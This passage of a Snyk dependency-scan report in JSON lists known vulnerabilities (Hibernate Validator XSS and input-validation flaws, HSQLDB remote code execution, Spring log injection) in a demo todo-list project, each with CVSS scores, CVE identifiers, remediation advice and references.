"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:45.778673Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:48.734535Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:09.119807Z" - }, - { - 
"type": "secondary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:45.778673Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", - 
"epssDetails": { - "percentile": "0.70800", - "probability": "0.00319", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3558" - ], - "CWE": [ - "CWE-592" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2016-12-25T16:51:53Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2014-07-17T16:51:53Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2014-07-17T16:51:53Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:45.778673Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-validator@6.0.23.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-568162", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Alvaro Muñoz" - ], - "semver": { - "vulnerable": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "6.0.19.Final", - "6.1.3.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ], - "functionId": { - "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", - "className": "ValidatorImpl", - "functionName": "validate" - 
} - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-validator/pull/1071", - "title": "GitHub PR" - }, - { - "url": "https://hibernate.atlassian.net/browse/HV-1758", - "title": "Jira Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:50:18.797394Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.490090Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:37.379564Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.797394Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.490090Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. 
This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", - "epssDetails": { - "percentile": "0.49937", - "probability": "0.00139", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10693" - ], - "CWE": [ - "CWE-20" - ], - "GHSA": [ - "GHSA-rmrm-75hp-phr2" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2020-05-05T12:05:58.541980Z", - "functions_new": [ - { - "version": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ], - "functionId": { - "className": "org.hibernate.validator.internal.engine.ValidatorImpl", - "functionName": "validate" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-05-05T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2020-05-05T16:32:46Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.490090Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-validator@6.0.23.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": 
"org.hibernate:hibernate-validator", - "version": "4.3.1.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-569100", - "title": "Cross-site Scripting (XSS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "6.0.18.Final", - "6.1.0.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [ - { - "version": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ], - "functionId": { - "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", - "className": "SafeHtmlValidator", - "functionName": "getFragmentAsDocument" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", - "title": "GitHub Commit" - }, - { - "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", - "title": "Hibernator Security Release Blog" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:51:34.418099Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:54:00.455389Z" - } - ], - 
"cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:47.749976Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:34.418099Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:54:00.455389Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. 
The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", - "epssDetails": { - "percentile": "0.61710", - "probability": "0.00232", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-10219" - ], - "CWE": [ - "CWE-79" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2020-05-14T16:07:06.897969Z", - "functions_new": [ - { - "version": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ], - "functionId": { - "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", - "functionName": "getFragmentAsDocument" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-10-18T14:55:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - 
"mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2020-01-09T14:55:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.455389Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-validator@6.0.23.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final" - }, - { - "id": "SNYK-JAVA-ORGHSQLDB-3040860", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "OSS Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,2.7.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hsqldb:hsqldb", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", - "title": "GitHub Commit" - }, - { - "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", - "title": "Mitigation" - }, - { - "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", - "title": "SVN Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:55.045961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. 
For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", - "epssDetails": { - "percentile": "0.85801", - "probability": "0.01274", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-41853" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-77xx-rxvh-q682" - ] - }, - "packageName": "org.hsqldb:hsqldb", - "proprietary": false, - "creationTime": "2022-10-07T07:26:42.276748Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-06T18:52:05Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hsqldb", - "artifactId": "hsqldb" - }, - "publicationTime": "2022-10-07T07:26:42.515068Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.414572Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hsqldb:hsqldb@2.3.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hsqldb:hsqldb", - "version": "2.3.2" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", - "title": "Improper Output Neutralization for Logs", - 
"CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Dennis Kennedy" - ], - "semver": { - "vulnerable": [ - "[5.3.0,5.3.12)", - "[,5.2.18)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.12", - "5.2.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", - "title": "Github Commit" - }, - { - "url": "https://pivotal.io/security/cve-2021-22096", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:20.847607Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "description": "## 
Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", - "epssDetails": { - "percentile": "0.34533", - "probability": "0.00079", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22096" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-02T11:14:46.053186Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-10-27T12:52:59Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2021-10-27T16:55:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.086414Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": 
"3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "psytester" - ], - "semver": { - "vulnerable": [ - "[,5.2.19.RELEASE)", - "[5.3.0,5.3.14)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.19.RELEASE", - "5.3.14" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://pivotal.io/security/cve-2021-22060", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:24.703024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "description": "## 
Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", - "epssDetails": { - "percentile": "0.23203", - "probability": "0.00054", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22060" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-06T12:31:26.181234Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-01-06T11:18:34Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2022-01-06T17:17:24.995166Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:10.667113Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", - "title": "Directory Traversal", - "CVSSv3": 
